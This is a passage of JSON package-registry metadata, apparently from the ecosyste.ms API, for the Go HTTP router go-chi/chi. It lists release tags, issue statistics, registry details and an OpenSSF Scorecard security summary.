s/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.228Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.671005451831473,"dependent_packages_count":6.2526578140658,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.461831632948636},"purl":"pkg:golang/github.com/go-%21c%21h%21i/chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-CHI/chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-CHI/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-CHI/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":8248682,"name":"github.com/go-chi/chi/v3","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi","versions_count":15,"first_release_published_at":"2023-09-08T04:32:47.304Z","latest_release_published_at":"2023-09-08T04:32:47.304Z","latest_release_number":"v3.3.4","last_synced_at":"2026-08-12T02:06:15.422Z","created_at":"2023-09-08T04:32:45.372Z","updated_at":"2026-08-12T02:06:15.423Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/v3","install_command":"go get github.com/go-chi/chi/v3","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/v3#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://rep